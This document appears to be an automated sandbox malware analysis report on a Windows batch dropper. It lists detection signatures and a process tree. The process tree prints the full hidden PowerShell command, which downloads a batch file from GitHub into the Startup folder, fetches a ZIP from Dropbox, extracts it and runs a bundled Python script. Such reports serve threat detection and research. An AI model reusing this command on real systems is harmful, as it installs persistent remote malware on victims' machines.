Edit tour
Windows
Analysis Report
zW72x5d91l.bat
Overview
General Information
| Sample name: | zW72x5d91l.batrenamed because original name is a hash value |
| Original sample name: | 25d7e9a512fccb4b87bc53a2dd939b823513333882852f833025601e71fa0746.bat |
| Analysis ID: | 1571738 |
| MD5: | c72963263d76893234b3b6c6342bdbbc |
| SHA1: | 55e01fd1eb905383222abe3a914adcde1f21558c |
| SHA256: | 25d7e9a512fccb4b87bc53a2dd939b823513333882852f833025601e71fa0746 |
| Tags: | batBraodouser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 2988 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\zW72x 5d91l.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 3348 cmdline: powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //github.c om/ty9989/ u/raw/main /ud.bat', 'C:\Users\ user\AppDa ta\Roaming \\Microsof t\\Windows \\Start Me nu\\Progra ms\\Startu p\\Windows Secure.bat '); (New-O bject -Typ eName Syst em.Net.Web Client).Do wnloadFile ('https:// www.dropbo x.com/scl/ fi/xgyxbty 4c17yg95zi uhf5/T1.zi p?rlkey=zh c1rx2g0o7k nrhq4xj62y w3w&st=xde 91yel&dl=1 ', 'C:\\Us ers\\Publi c\\Documen t.zip'); A dd-Type -A ssemblyNam e System.I O.Compress ion.FileSy stem; [Sys tem.IO.Com pression.Z ipFile]::E xtractToDi rectory('C :/Users/Pu blic/Docum ent.zip', 'C:/Users/ Public/Doc ument'); S tart-Sleep -Seconds 1; C:\\Use rs\\Public \\Document \\python.e xe C:\User s\Public\D ocument\Li b\prt.py; Remove-Ite m 'C:/User s/Public/D ocument.zi p' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
python.exe (PID: 7036 cmdline: "C:\Users\ Public\Doc ument\pyth on.exe" C: \Users\Pub lic\Docume nt\Lib\prt .py MD5: A7F3026E4CF239F0A24A021751D17AE2) - cmd.exe (PID: 4920 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 1604 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||